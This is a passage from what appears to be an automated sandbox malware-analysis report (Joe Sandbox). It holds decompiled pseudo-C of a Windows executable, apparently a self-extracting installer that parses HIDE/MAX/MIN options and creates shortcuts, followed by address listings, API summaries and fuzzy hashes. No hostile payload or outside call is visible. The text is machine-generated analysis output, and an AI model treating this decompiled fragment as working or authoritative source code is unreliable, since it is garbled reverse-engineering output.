                									L87:
                									__eax = __ebp - 0x588a;
                									_push(0x3e);
                									_push(__ebp - 0x588a);
                									__eax = E003F22C6(__ecx);
                									_pop(__ecx);
                									_pop(__ecx);
                									__eflags = __eax;
                									if(__eax == 0) {
                										L96:
                										__eax =  *(__ebp - 0x14);
                										goto L97;
                									}
                									L88:
                									_t103 = __eax + 2; // 0x2
                									__ecx = _t103;
                									 *(__ebp - 0x14) = _t103;
                									__ecx = 0;
                									 *__eax = __cx;
                									__eax = __ebp - 0x10c;
                									_push(0x64);
                									_push(__ebp - 0x10c);
                									__eax = __ebp - 0x588a;
                									_push(__ebp - 0x588a);
                									__eax = E003EAF98();
                									 *(__ebp - 0x20) = __eax;
                									__eflags = __eax;
                									if(__eax == 0) {
                										goto L96;
                									}
                									L89:
                									__esi = __eax;
                									while(1) {
                										L90:
                										__eflags =  *(__ebp - 0x10c);
                										if( *(__ebp - 0x10c) == 0) {
                											goto L96;
                										}
                										L91:
                										__eax = __ebp - 0x10c;
                										__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
                										__eax =  ~__eax;
                										asm("sbb eax, eax");
                										__edi = __edi & __eax;
                										__eax = __ebp - 0x10c;
                										__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
                										__eflags = __eax;
                										if(__eax == 0) {
                											_push(3);
                											_pop(__edi);
                										}
                										__eax = __ebp - 0x10c;
                										__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
                										__eflags = __eax;
                										if(__eax == 0) {
                											_push(6);
                											_pop(__edi);
                										}
                										_push(0x64);
                										__eax = __ebp - 0x10c;
                										_push(__ebp - 0x10c);
                										_push(__esi);
                										__esi = E003EAF98();
                										__eflags = __esi;
                										if(__esi != 0) {
                											continue;
                										} else {
                											goto L96;
                										}
                									}
                									goto L96;
                								case 7:
                									goto L0;
                								case 8:
                									L127:
                									__eflags = __ebx - 3;
                									if(__ebx == 3) {
                										__eflags =  *(__ebp - 0x588c) - __di;
                										if(__eflags != 0) {
                											__eax = __ebp - 0x588c;
                											_push(__ebp - 0x588c);
                											__eax = E003F7625(__ebx, __edi);
                											_pop(__ecx);
                											 *0x42fc9c = __eax;
                										}
                										__eax = __ebp + 0xc;
                										_push(__ebp + 0xc);
                										 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
                									}
                									 *0x41c576 = 1;
                									goto L175;
                								case 9:
                									L132:
                									__eflags = __ebx - 6;
                									if(__ebx != 6) {
                										goto L175;
                									}
                									L133:
                									__eax = 0;
                									 *(__ebp - 0x2844) = __ax;
                									__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                									__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                									__eflags = __eax - 0x50;
                									if(__eax == 0x50) {
                										 *(__ebp - 0x14) = 2;
                										__eax = 0x42cb82;
                									} else {
                										__eflags = __eax - 0x54;
                										if(__eax == 0x54) {
                											 *(__ebp - 0x14) = 7;
                											__eax = 0x42bb82;
                										} else {
                											 *(__ebp - 0x14) = 0x10;
                											__eax = 0x42db82;
                										}
                									}
                									__esi = 0x800;
                									__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                									__eax = 0;
                									 *(__ebp - 0x9894) = __ax;
                									 *(__ebp - 0x1844) = __ax;
                									__ebp - 0x19894 = __ebp - 0x688c;
                									__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                									_push(0x22);
                									_pop(__ebx);
                									__eflags =  *(__ebp - 0x688c) - __bx;
                									if( *(__ebp - 0x688c) != __bx) {
                										L141:
                										__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                										__eflags = __al;
                										if(__al != 0) {
                											goto L160;
                										}
                										L142:
                										__ax =  *(__ebp - 0x688c);
                										__esi = __ebp - 0x688c;
                										__ebx = __edi;
                										__eflags = __ax;
                										if(__ax == 0) {
                											L159:
                											__esi = 0x800;
                											goto L160;
                										}
                										L143:
                										__edi = __ax & 0x0000ffff;
                										do {
                											L144:
                											_push(0x20);
                											_pop(__eax);
                											__eflags = __di - __ax;
                											if(__di == __ax) {
                												L146:
                												__eax = 0;
                												__esi->i = __ax;
                												__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                												__eflags = __al;
                												if(__al == 0) {
                													L155:
                													__esi->i = __di;
                													goto L156;
                												}
                												L147:
                												__ebp - 0x688c = E003DA243(__ebp - 0x688c);
                												__eax = E003DA28F(__eax);
                												__eflags = __al;
                												if(__al != 0) {
                													goto L155;
                												}
                												L148:
                												_push(0x2f);
                												_pop(__ecx);
                												__eax =  &(__esi->i);
                												__ebx = __esi;
                												__eflags = __di - __cx;
                												if(__di != __cx) {
                													L150:
                													_push(0x20);
                													__esi = __eax;
                													_pop(__eax);
                													while(1) {
                														L152:
                														__eflags = __esi->i - __ax;
                														if(__esi->i != __ax) {
                															break;
                														}
                														L151:
                														__esi =  &(__esi->i);
                														__eflags = __esi;
                													}
                													L153:
                													__ecx = __ebp - 0x1844;
                													__eax = __esi;
                													__edx = 0x400;
                													L154:
                													__eax = E003E0602(__ecx, __eax, __edx);
                													 *__ebx = __di;
                													goto L156;
                												}
                												L149:
                												 *(__ebp - 0x1844) = __cx;
                												__edx = 0x3ff;
                												__ecx = __ebp - 0x1842;
                												goto L154;
                											}
                											L145:
                											_push(0x2f);
                											_pop(__eax);
                											__eflags = __di - __ax;
                											if(__di != __ax) {
                												goto L156;
                											}
                											goto L146;
                											L156:
                											__esi =  &(__esi->i);
                											__eax = __esi->i & 0x0000ffff;
                											__edi = __esi->i & 0x0000ffff;
                											__eflags = __ax;
                										} while (__ax != 0);
                										__esi = 0x800;
                										__eflags = __ebx;
                										if(__ebx != 0) {
                											__eax = 0;
                											 *__ebx = __ax;
                										}
                										goto L160;
                									} else {
                										L139:
                										__ebp - 0x19892 = __ebp - 0x688c;
                										E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                										_push(__ebx);
                										_push(__ebp - 0x688a);
                										__eax = E003F22C6(__ecx);
                										_pop(__ecx);
                										_pop(__ecx);
                										__eflags = __eax;
                										if(__eax != 0) {
                											__ecx = 0;
                											 *__eax = __cx;
                											__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                										}
                										L160:
                										__eflags =  *((short*)(__ebp - 0x11894));
                										if( *((short*)(__ebp - 0x11894)) != 0) {
                											__ebp - 0x9894 = __ebp - 0x11894;
                											__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                										}
                										__ebp - 0xb894 = __ebp - 0x688c;
                										__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                										__eflags =  *(__ebp - 0x2844);
                										if(__eflags == 0) {
                											__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                										}
                										__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
                										__eflags =  *((short*)(__ebp - 0x17894));
                										if(__eflags != 0) {
                											__ebp - 0x17894 = __ebp - 0x2844;
                											E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                											__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
                										}
                										__ebp - 0x2844 = __ebp - 0xc894;
                										__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                										__eflags =  *(__ebp - 0x13894);
                										__eax = __ebp - 0x13894;
                										if(__eflags == 0) {
                											__eax = __ebp - 0x19894;
                										}
                										__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                										__eax = __ebp - 0x2844;
                										__eflags = E003DB92D(__ebp - 0x2844);
                										if(__eflags == 0) {
                											L170:
                											__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                											goto L171;
                										} else {
                											L169:
                											__eflags = __eax;
                											if(__eflags == 0) {
                												L171:
                												__ebx = 0;
                												__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                												__ebp - 0xb894 = __ebp - 0xa894;
                												E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                												__eax = E003DC2E4(__eflags, __ebp - 0xa894);
                												__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                												__eax = __ebp - 0x1844;
                												__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                												__edi = __ebp - 0xa894;
                												__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                												asm("sbb esi, esi");
                												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                												__eax = __ebp - 0x9894;
                												asm("sbb edx, edx");
                												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                												__eax = __ebp - 0x15894;
                												asm("sbb ecx, ecx");
                												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                												 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                												asm("sbb eax, eax");
                												 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                												__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                												__eflags =  *(__ebp - 0xc894) - __bx;
                												if( *(__ebp - 0xc894) != __bx) {
                													_push(0);
                													__eax = __ebp - 0xc894;
                													_push(__ebp - 0xc894);
                													_push(5);
                													_push(0x1000);
                													__eax =  *0x43308c();
                												}
                												goto L175;
                											}
                											goto L170;
                										}
                									}
                								case 0xa:
                									L173:
                									__eflags = __ebx - 7;
                									if(__ebx == 7) {
                										 *0x41a470 = 1;
                									}
                									goto L175;
                								case 0xb:
                									L81:
                									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                									__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
                									__eflags = __eax - 0x46;
                									if(__eax == 0x46) {
                										 *0x418461 = 1;
                									} else {
                										__eflags = __eax - 0x55;
                										if(__eax == 0x55) {
                											 *0x418462 = 1;
                										} else {
                											__eax = 0;
                											 *0x418461 = __al;
                											 *0x418462 = __al;
                										}
                									}
                									goto L175;
                								case 0xc:
                									L104:
                									 *0x427b7a = 1;
                									__eax = __eax + 0x427b7a;
                									_t117 = __esi + 0x39;
                									 *_t117 =  *(__esi + 0x39) + __esp;
                									__eflags =  *_t117;
                									__ebp = 0xffffa774;
                									if( *_t117 != 0) {
                										_t119 = __ebp - 0x588c; // 0xffff4ee8
                										__eax = _t119;
                										 *0x40e728 = E003E1FA7(_t119);
                									}
                									goto L175;
                							}
                							L2:
                							_push(0x1000);
                							_push(_t294);
                							_push(_t226);
                							_t226 = E003EAF98();
                							_t294 = _t294 + 0x2000;
                							_t292 = _t292 - 1;
                							if(_t292 != 0) {
                								goto L2;
                							} else {
                								_t295 = _t292;
                								goto L4;
                							}
                						}
                						L176:
                						 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
                						return _t225;
                					}
                					L111:
                					__eflags =  *0x41c575 - __bl;
                					if( *0x41c575 != __bl) {
                						goto L175;
                					}
                					L112:
                					__eax = 0;
                					 *(__ebp - 0x444) = __ax;
                					__eax = __ebp - 0x588c;
                					_push(__ebp - 0x588c);
                					__eax = E003F22C6(__ecx);
                					_pop(__ecx);
                					__ecx = 0x2c;
                					__eflags = __eax;
                					if(__eax != 0) {
                						L119:
                						__eflags =  *(__ebp - 0x444) - __bx;
                						if( *(__ebp - 0x444) == __bx) {
                							__ebp - 0x1b894 = __ebp - 0x588c;
                							E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                							__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                						}
                						__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
                						__eax = 0;
                						 *(__ebp - 0x488c) = __ax;
                						__ebp - 0x444 = __ebp - 0x588c;
                						__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                						__eflags = __eax - 6;
                						if(__eax != 6) {
                							__eax = 0;
                							 *0x418454 = 1;
                							 *0x41946a = __ax;
                							__eax = EndDialog( *(__ebp + 8), 1);
                						}
                						goto L175;
                					}
                					L113:
                					__ax =  *(__ebp - 0x588c);
                					__esi = __ebx;
                					__eflags = __ax;
                					if(__ax == 0) {
                						goto L119;
                					}
                					L114:
                					__ecx = __ax & 0x0000ffff;
                					while(1) {
                						L115:
                						__eflags = __cx - 0x40;
                						if(__cx == 0x40) {
                							break;
                						}
                						L116:
                						__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                						__esi =  &(__esi->i);
                						__ecx = __eax;
                						__eflags = __ax;
                						if(__ax != 0) {
                							continue;
                						}
                						L117:
                						goto L119;
                					}
                					L118:
                					__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                					__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                					__eax = 0;
                					__eflags = 0;
                					 *(__ebp + __esi * 2 - 0x588c) = __ax;
                					goto L119;
                					L123:
                					__eflags = __ebx - 7;
                					if(__ebx == 7) {
                						__eflags =  *0x41a46c - 0x800;
                						if( *0x41a46c == 0x800) {
                							 *0x41a46c = 2;
                						}
                						 *0x419468 = 1;
                					}
                					goto L175;
                				}
                			}









                0x003ece42
                0x003ece45
                0x00000000
                0x00000000
                0x003ece4b
                0x003ece4b
                0x003ece4b
                0x003ece4d
                0x003ece4e
                0x003ece4e
                0x003ece4f
                0x003ece50
                0x003ece53
                0x00000000
                0x003ece53
                0x003ece2b
                0x003ece2b
                0x003ece2e
                0x00000000
                0x00000000
                0x003ece34
                0x003ece34
                0x00000000
                0x003ece34
                0x003ecd7b
                0x003ecd7b
                0x003ecd81
                0x003ecd83
                0x003ecd84
                0x003ecd89
                0x003ecd8a
                0x003ecd8b
                0x003ecd8d
                0x003ece22
                0x003ece22
                0x00000000
                0x003ece22
                0x003ecd93
                0x003ecd93
                0x003ecd93
                0x003ecd96
                0x003ecd99
                0x003ecd9b
                0x003ecd9e
                0x003ecda4
                0x003ecda6
                0x003ecda7
                0x003ecdad
                0x003ecdae
                0x003ecdb3
                0x003ecdb6
                0x003ecdb8
                0x00000000
                0x00000000
                0x003ecdba
                0x003ecdba
                0x003ecdbc
                0x003ecdbc
                0x003ecdbc
                0x003ecdc4
                0x00000000
                0x00000000
                0x003ecdc6
                0x003ecdcb
                0x003ecdd2
                0x003ecdd7
                0x003ecdde
                0x003ecde0
                0x003ecde2
                0x003ecde9
                0x003ecdee
                0x003ecdf0
                0x003ecdf2
                0x003ecdf4
                0x003ecdf4
                0x003ecdfa
                0x003ece01
                0x003ece06
                0x003ece08
                0x003ece0a
                0x003ece0c
                0x003ece0c
                0x003ece0d
                0x003ece0f
                0x003ece15
                0x003ece16
                0x003ece1c
                0x003ece1e
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ed030
                0x003ed030
                0x003ed033
                0x003ed035
                0x003ed03c
                0x003ed03e
                0x003ed044
                0x003ed045
                0x003ed04a
                0x003ed04b
                0x003ed04b
                0x003ed050
                0x003ed053
                0x003ed059
                0x003ed059
                0x003ed05e
                0x00000000
                0x00000000
                0x003ed06a
                0x003ed06a
                0x003ed06d
                0x00000000
                0x00000000
                0x003ed073
                0x003ed073
                0x003ed075
                0x003ed07c
                0x003ed084
                0x003ed08a
                0x003ed08d
                0x003ed0b0
                0x003ed0b7
                0x003ed08f
                0x003ed08f
                0x003ed092
                0x003ed0a2
                0x003ed0a9
                0x003ed094
                0x003ed094
                0x003ed09b
                0x003ed09b
                0x003ed092
                0x003ed0bc
                0x003ed0ca
                0x003ed0cf
                0x003ed0d1
                0x003ed0d8
                0x003ed0e7
                0x003ed0ee
                0x003ed0f3
                0x003ed0f5
                0x003ed0f6
                0x003ed0fd
                0x003ed149
                0x003ed150
                0x003ed155
                0x003ed157
                0x00000000
                0x00000000
                0x003ed15d
                0x003ed15d
                0x003ed164
                0x003ed16a
                0x003ed16c
                0x003ed16f
                0x003ed221
                0x003ed221
                0x00000000
                0x003ed221
                0x003ed175
                0x003ed175
                0x003ed178
                0x003ed178
                0x003ed178
                0x003ed17a
                0x003ed17b
                0x003ed17e
                0x003ed188
                0x003ed188
                0x003ed18a
                0x003ed194
                0x003ed199
                0x003ed19b
                0x003ed1fd
                0x003ed1fd
                0x00000000
                0x003ed1fd
                0x003ed19d
                0x003ed1a4
                0x003ed1aa
                0x003ed1af
                0x003ed1b1
                0x00000000
                0x00000000
                0x003ed1b3
                0x003ed1b3
                0x003ed1b5
                0x003ed1b6
                0x003ed1b9
                0x003ed1bb
                0x003ed1be
                0x003ed1d4
                0x003ed1d4
                0x003ed1d6
                0x003ed1d8
                0x003ed1de
                0x003ed1de
                0x003ed1de
                0x003ed1e1
                0x00000000
                0x00000000
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1e3
                0x003ed1e3
                0x003ed1e9
                0x003ed1eb
                0x003ed1f0
                0x003ed1f3
                0x003ed1f8
                0x00000000
                0x003ed1f8
                0x003ed1c0
                0x003ed1c0
                0x003ed1c7
                0x003ed1cc
                0x00000000
                0x003ed1cc
                0x003ed180
                0x003ed180
                0x003ed182
                0x003ed183
                0x003ed186
                0x00000000
                0x00000000
                0x00000000
                0x003ed200
                0x003ed200
                0x003ed203
                0x003ed206
                0x003ed208
                0x003ed208
                0x003ed211
                0x003ed216
                0x003ed218
                0x003ed21a
                0x003ed21c
                0x003ed21c
                0x00000000
                0x003ed0ff
                0x003ed0ff
                0x003ed107
                0x003ed113
                0x003ed119
                0x003ed11a
                0x003ed11b
                0x003ed120
                0x003ed121
                0x003ed122
                0x003ed124
                0x003ed12a
                0x003ed12c
                0x003ed13f
                0x003ed13f
                0x003ed226
                0x003ed226
                0x003ed22e
                0x003ed238
                0x003ed23f
                0x003ed23f
                0x003ed24c
                0x003ed253
                0x003ed258
                0x003ed260
                0x003ed26c
                0x003ed26c
                0x003ed279
                0x003ed27e
                0x003ed286
                0x003ed290
                0x003ed29d
                0x003ed2a4
                0x003ed2a4
                0x003ed2b1
                0x003ed2b8
                0x003ed2bd
                0x003ed2c5
                0x003ed2cb
                0x003ed2cd
                0x003ed2cd
                0x003ed2e2
                0x003ed2e7
                0x003ed2f3
                0x003ed2f5
                0x003ed306
                0x003ed313
                0x00000000
                0x003ed2f7
                0x003ed2f7
                0x003ed302
                0x003ed304
                0x003ed318
                0x003ed318
                0x003ed324
                0x003ed331
                0x003ed33d
                0x003ed344
                0x003ed349
                0x003ed350
                0x003ed356
                0x003ed35d
                0x003ed363
                0x003ed36a
                0x003ed36c
                0x003ed36e
                0x003ed370
                0x003ed372
                0x003ed378
                0x003ed37a
                0x003ed37c
                0x003ed37e
                0x003ed384
                0x003ed386
                0x003ed390
                0x003ed393
                0x003ed399
                0x003ed3a8
                0x003ed3ad
                0x003ed3b4
                0x003ed3b6
                0x003ed3b7
                0x003ed3bd
                0x003ed3be
                0x003ed3c0
                0x003ed3c5
                0x003ed3c5
                0x00000000
                0x003ed3b4
                0x00000000
                0x003ed304
                0x003ed2f5
                0x00000000
                0x003ed3cd
                0x003ed3cd
                0x003ed3d0
                0x003ed3d2
                0x003ed3d2
                0x00000000
                0x00000000
                0x003ecd17
                0x003ecd17
                0x003ecd1f
                0x003ecd25
                0x003ecd28
                0x003ecd4c
                0x003ecd2a
                0x003ecd2a
                0x003ecd2d
                0x003ecd40
                0x003ecd2f
                0x003ecd2f
                0x003ecd31
                0x003ecd36
                0x003ecd36
                0x003ecd2d
                0x00000000
                0x00000000
                0x003ece5d
                0x003ece5d
                0x003ece5e
                0x003ece63
                0x003ece63
                0x003ece63
                0x003ece66
                0x003ece6b
                0x003ece71
                0x003ece71
                0x003ece7d
                0x003ece7d
                0x00000000
                0x00000000
                0x003ec7a2
                0x003ec7a2
                0x003ec7a7
                0x003ec7a8
                0x003ec7a9
                0x003ec7ae
                0x003ec7b4
                0x003ec7b7
                0x00000000
                0x003ec7b9
                0x003ec7b9
                0x00000000
                0x003ec7b9
                0x003ec7b7
                0x003ed40a
                0x003ed410
                0x003ed418
                0x003ed418
                0x003ecf04
                0x003ecf04
                0x003ecf0a
                0x00000000
                0x00000000
                0x003ecf10
                0x003ecf10
                0x003ecf12
                0x003ecf19
                0x003ecf21
                0x003ecf22
                0x003ecf27
                0x003ecf28
                0x003ecf29
                0x003ecf2b
                0x003ecf7b
                0x003ecf7b
                0x003ecf82
                0x003ecf90
                0x003ecfa1
                0x003ecfaf
                0x003ecfaf
                0x003ecfbb
                0x003ecfc0
                0x003ecfc2
                0x003ecfd2
                0x003ecfdc
                0x003ecfe1
                0x003ecfe4
                0x003ecfef
                0x003ecff1
                0x003ecff8
                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x003ecf54
                0x00000000
                0x003ecf54
                0x003ecf56
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x003ed009
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c

                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 003ECE9D
                  • Part of subcall function 003DB690: _wcslen.LIBCMT ref: 003DB696
                • _swprintf.LIBCMT ref: 003ECED1
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(?,00000066,0041946A), ref: 003ECEF1
                • _wcschr.LIBVCRUNTIME ref: 003ECF22
                • EndDialog.USER32(?,00000001), ref: 003ECFFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                • String ID: %s%s%u
                • API String ID: 689974011-1360425832
                • Opcode ID: 924a08ee86de5057feb7d77b782ede8b2bdbbb4f6b32314916bd7fd126d3ad44
                • Instruction ID: c39da653bae204dc25d24506aaf1576abe7a1d37462105947c814c393ce2890d
                • Opcode Fuzzy Hash: 924a08ee86de5057feb7d77b782ede8b2bdbbb4f6b32314916bd7fd126d3ad44
                • Instruction Fuzzy Hash: 8C4193B19002A8AADF269B51DC45FEE77BCEB04301F4081A6F909E7181EF749E85CF65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E003F2900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v5;
                				signed int _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _t52;
                				signed int _t59;
                				intOrPtr _t60;
                				void* _t61;
                				intOrPtr* _t62;
                				intOrPtr _t64;
                				intOrPtr _t67;
                				intOrPtr _t72;
                				intOrPtr* _t76;
                				intOrPtr _t77;
                				signed int _t81;
                				char _t83;
                				intOrPtr _t86;
                				intOrPtr _t93;
                				intOrPtr _t96;
                				intOrPtr* _t98;
                				void* _t102;
                				void* _t104;
                				void* _t111;
                
                				_t89 = __edx;
                				_t76 = _a4;
                				_push(__edi);
                				_v5 = 0;
                				_v16 = 1;
                				 *_t76 = E00402567(__ecx,  *_t76);
                				_t77 = _a8;
                				_t6 = _t77 + 0x10; // 0x11
                				_t96 = _t6;
                				_push(_t96);
                				_v20 = _t96;
                				_v12 =  *(_t77 + 8) ^  *0x40e7ac;
                				E003F28C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x40e7ac);
                				E003F396C(_a12);
                				_t52 = _a4;
                				_t104 = _t102 - 0x1c + 0x10;
                				_t93 =  *((intOrPtr*)(_t77 + 0xc));
                				if(( *(_t52 + 4) & 0x00000066) != 0) {
                					__eflags = _t93 - 0xfffffffe;
                					if(_t93 != 0xfffffffe) {
                						_t89 = 0xfffffffe;
                						E003F3AF0(_t77, 0xfffffffe, _t96, 0x40e7ac);
                						goto L13;
                					}
                					goto L14;
                				} else {
                					_v32 = _t52;
                					_v28 = _a12;
                					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                					if(_t93 == 0xfffffffe) {
                						L14:
                						return _v16;
                					} else {
                						do {
                							_t81 = _v12;
                							_t59 = _t93 + (_t93 + 2) * 2;
                							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
                							_t60 = _t81 + _t59 * 4;
                							_t82 =  *((intOrPtr*)(_t60 + 4));
                							_v24 = _t60;
                							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                								_t83 = _v5;
                								goto L7;
                							} else {
                								_t89 = _t96;
                								_t61 = E003F3A90(_t82, _t96);
                								_t83 = 1;
                								_v5 = 1;
                								_t111 = _t61;
                								if(_t111 < 0) {
                									_v16 = 0;
                									L13:
                									_push(_t96);
                									E003F28C0(_t77, _t89, _t93, _t96, _v12);
                									goto L14;
                								} else {
                									if(_t111 > 0) {
                										_t62 = _a4;
                										__eflags =  *_t62 - 0xe06d7363;
                										if( *_t62 == 0xe06d7363) {
                											__eflags =  *0x4058dc;
                											if(__eflags != 0) {
                												_t72 = E00402090(__eflags, 0x4058dc);
                												_t104 = _t104 + 4;
                												__eflags = _t72;
                												if(_t72 != 0) {
                													_t98 =  *0x4058dc; // 0x3f0150
                													 *0x403278(_a4, 1);
                													 *_t98();
                													_t96 = _v20;
                													_t104 = _t104 + 8;
                												}
                												_t62 = _a4;
                											}
                										}
                										_t90 = _t62;
                										E003F3AD0(_t62, _a8, _t62);
                										_t64 = _a8;
                										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
                										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
                											_t90 = _t93;
                											E003F3AF0(_t64, _t93, _t96, 0x40e7ac);
                											_t64 = _a8;
                										}
                										_push(_t96);
                										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
                										E003F28C0(_t77, _t90, _t93, _t96, _v12);
                										_t86 =  *((intOrPtr*)(_v24 + 8));
                										E003F3AB0();
                										asm("int3");
                										__eflags = E003F3B07();
                										if(__eflags != 0) {
                											_t67 = E003F2B8C(_t86, __eflags);
                											__eflags = _t67;
                											if(_t67 != 0) {
                												return 1;
                											} else {
                												E003F3B43();
                												goto L24;
                											}
                										} else {
                											L24:
                											__eflags = 0;
                											return 0;
                										}
                									} else {
                										goto L7;
                									}
                								}
                							}
                							goto L28;
                							L7:
                							_t93 = _t77;
                						} while (_t77 != 0xfffffffe);
                						if(_t83 != 0) {
                							goto L13;
                						}
                						goto L14;
                					}
                				}
                				L28:
                			}






























                APIs
                • _ValidateLocalCookies.LIBCMT ref: 003F2937
                • ___except_validate_context_record.LIBVCRUNTIME ref: 003F293F
                • _ValidateLocalCookies.LIBCMT ref: 003F29C8
                • __IsNonwritableInCurrentImage.LIBCMT ref: 003F29F3
                • _ValidateLocalCookies.LIBCMT ref: 003F2A48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
